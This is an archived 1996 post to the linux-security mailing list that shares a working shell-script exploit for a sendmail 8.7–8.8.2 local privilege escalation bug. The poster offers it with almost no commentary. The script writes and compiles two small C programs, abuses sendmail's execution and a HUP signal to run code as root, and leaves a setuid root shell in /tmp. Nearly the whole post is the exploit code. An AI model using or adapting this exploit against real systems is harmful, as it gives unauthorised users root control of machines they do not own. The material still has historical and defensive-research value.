[1298] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Sendmail 8.8.2 exploit.

daemon@ATHENA.MIT.EDU (Dawnshadow)
Sun Nov 17 19:14:43 1996

Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
To: linux-security@redhat.com
Old-X-Envelope-From: sdx@linnea.asogy.stockholm.se  Sat Nov 16 20:31:43 1996
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com

Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:

#! /bin/sh
#
#
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh


home help back first fref pref prev next nref lref last post